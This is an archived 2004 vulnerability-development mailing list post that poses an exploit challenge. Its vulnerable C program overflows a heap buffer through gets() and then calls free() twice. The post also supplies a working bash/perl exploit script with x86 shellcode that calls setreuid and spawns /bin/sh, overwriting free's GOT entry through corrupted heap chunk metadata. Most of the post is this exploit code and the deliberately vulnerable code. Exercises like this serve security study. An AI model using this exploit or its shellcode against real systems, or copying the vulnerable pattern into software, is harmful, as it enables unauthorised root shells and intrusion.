Vulnerability Development mailing list archives
challenge
From: "fuzzy () bonbon net" <fuzzy () bonbon net>
Date: Sat, 11 Sep 2004 08:43:29 -0400
//----=[ Challenge ]=----// Having been with the vulndev mailing list for a while now without seeing an exploit challenge, I thought I would offer one up for the masses... However this vulnerability is simple in design yet appears to be difficult to exploit in C... I have supplied a working bash script for the vuln, but it relies upon the perl interpreter to supply the payload... The challenge is to create a working exploit in C, and not perl, bash. /* vuln.c */ /* familiar? ... */ #define LEN 256 int main(void) { char *buf1 = (char *)malloc(LEN); char *buf2 = (char *)malloc(LEN); printf("buf1: %p\n", buf1); printf("buf2: %p\n", buf2); gets(buf1); free(buf2); free(buf1); } Notice the gets() function and the ordering of the free()'s.. The bash script using perl is as follows... #!/bin/sh # Thanks je # No error checking shellcode=` printf "\xeb\x10AAAABBBBCCCCDDDD" printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80" printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" ` prog=./vuln dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'` code_addr=`perl -e 'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'` echo "Shell dropped" (perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) . pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| \ env - shellcode=$shellcode \ ./vuln exit 0 Hopefully I shall get responses to this challenge,... Regards... //-----=[ EOF ]=-----// -------------------------------------------------------------------- mail2web - Check your email from the web at http://mail2web.com/ .
Current thread:
- challenge fuzzy () bonbon net (Sep 14)
- <Possible follow-ups>
- Re: challenge Marco Ivaldi (Sep 16)
- Re: challenge Marco Ivaldi (Sep 14)
- Re: challenge Marco Ivaldi (Sep 14)